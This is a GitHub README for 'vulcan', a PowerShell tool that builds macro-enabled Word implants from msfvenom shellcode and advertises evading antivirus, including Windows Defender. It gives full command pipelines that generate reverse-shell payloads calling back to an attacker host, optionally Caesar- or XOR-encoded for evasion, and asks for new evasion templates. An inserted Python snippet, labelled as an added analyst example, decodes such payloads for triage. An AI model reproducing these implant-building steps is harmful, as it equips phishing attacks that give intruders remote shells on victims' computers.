A PowerShell script to automate the creation of consistent and efficient macro-enabled Word documents. At the time of writing, the `indirect` template yields great results at evading most AVs, including Windows Defender in some cases.

This PowerShell script can be viewed as a third-party add-on to MSFVenom, made possible thanks to Windows Subsystem for Linux, that leverages templates to quickly and easily create (encoded) Word implants.

Users/stargazers are greatly encouraged to contribute to improving and extending this project. 🐺
- Decoding routines/functions (`.\assets\decoders`) -> do not hesitate to submit new templates.
- Piping of shellcodes, allowing for complex transformations in order to evade AVs.
- Visual Basic templating (`.\assets\templates`) -> do not hesitate to submit new templates.
- Work-around for Visual Basic line-continuation limitations using `-Treshold`.
- Windows Subsystem for Linux with MSFVenom installed.
- Clone this repository:

  ```powershell
  git clone https://github.com/aress31/vulcan
  cd vulcan
  ```

- Load the PowerShell scripts:

  ```powershell
  Import-Module -Name .\Vulcan.psm1
  ```

- (Optional) List available commands:

  ```powershell
  Get-Module -Name vulcan | select -ExpandProperty ExportedFunctions
  ```

- Run vulcan:

  ```powershell
  wsl --exec msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
  Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
  ```
Although obvious, `windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread` is a placeholder in the above example... 🙄

`Get-Help -Name Invoke-Vulcan` is your friend... Your best friend is `Get-Help -Name Invoke-Vulcan -Detailed`. Nonetheless, `Invoke-Vulcan` must be fed a hex-formatted shellcode. This can be achieved with either:

```powershell
Get-Content -Path $ShellCode | Invoke-Vulcan ...
wsl --exec msfvenom ... -f hex | Invoke-Vulcan ...
```
- Embed a plain shellcode:

  ```powershell
  wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
  Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
  ```

- Embed a Caesar-encoded shellcode:

  ```powershell
  wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
  Invoke-Caesar -Key 5 | `
  Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder Caesar -DecoderPath ".\assets\decoders\caesar.vba" -Key 5 -Verbose
  ```

- Embed an XOR-encoded shellcode:

  ```powershell
  wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | `
  Invoke-XOR -Key "StarWatchThisRepo" | `
  Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder XOR -DecoderPath ".\assets\decoders\xor.vba" -Key "StarWatchThisRepo" -Verbose
  ```
> [!WARNING]
> The length of the key must be shorter than the shellcode.
Although obvious, `windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread` is a placeholder in the above examples... 🙄
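When triaging a document built this way, an analyst needs to undo the Caesar or XOR step to get back to the original hex payload. The script below is an added example, not part of vulcan; it assumes (unverified against the project's source) that Caesar is a per-byte shift by the key modulo 256 and XOR is a repeating-key XOR over the raw bytes of the msfvenom `-f hex` output, and it enforces the key-length rule from the warning above.

```python
"""Recover a payload from the hex blob a vulcan-built macro carries.

Added analyst example; not part of vulcan. Assumes (unverified) that Caesar
is a per-byte shift by the key modulo 256 and XOR is a repeating-key XOR,
both applied to the raw bytes behind msfvenom's "-f hex" output.
"""


def parse_hex_blob(hex_blob: str) -> bytes:
    """Turn an msfvenom "-f hex" string (whitespace/newlines tolerated) into bytes."""
    return bytes.fromhex("".join(hex_blob.split()))


def xor_key_ok(key: bytes, payload: bytes) -> bool:
    """README rule: the key must be non-empty and shorter than the shellcode."""
    return 0 < len(key) < len(payload)


def caesar_decode(payload: bytes, key: int) -> bytes:
    """Undo a per-byte shift by `key`, wrapping modulo 256."""
    return bytes((b - key) % 256 for b in payload)


def xor_decode(payload: bytes, key: bytes) -> bytes:
    """Undo a repeating-key XOR; XOR is its own inverse, so this also encodes."""
    if not xor_key_ok(key, payload):
        raise ValueError(f"key ({len(key)} bytes) must be shorter than payload ({len(payload)} bytes)")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))


def recover(hex_blob: str, decoder: str, key) -> bytes:
    """Dispatch on the -Decoder name used on the Invoke-Vulcan command line."""
    data = parse_hex_blob(hex_blob)
    if decoder == "Caesar":
        return caesar_decode(data, int(key))
    if decoder == "XOR":
        return xor_decode(data, key.encode() if isinstance(key, str) else key)
    raise ValueError(f"unknown decoder: {decoder!r}")


def looks_like_msfvenom_stub(payload: bytes) -> bool:
    """Heuristic only: many msfvenom Windows payloads open with CLD (0xFC).
    True suggests the decode parameters were right; False proves nothing."""
    return payload[:1] == b"\xfc"


if __name__ == "__main__":
    # Constructed stand-in, not real shellcode: a CLD byte followed by a counter.
    sample = b"\xfc" + bytes(range(1, 24))
    encoded = xor_decode(sample, b"StarWatchThisRepo").hex()  # encode via symmetry
    print(recover(encoded, "XOR", "StarWatchThisRepo") == sample)  # True
```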
If you want to support this project and appreciate the time invested in developing, maintaining and extending it, consider donating toward my next (cup of coffee ☕/Lamborghini 🚗), as a lot of my personal time went into creating this project. 😪

It is easy, all you have to do is press the Sponsor button at the top of this page or alternatively click this link. 😁
Found a bug 🐛? I would love to squash it! Please report all issues on the GitHub issues tracker.

You would like to contribute to better this project? 🤩 Please submit all PRs on the GitHub pull requests tracker.
Give to Caesar (no pun intended 🙄) what belongs to Caesar: vulcan is distributed under the terms of the BSD 3-Clause license. See LICENSE for details.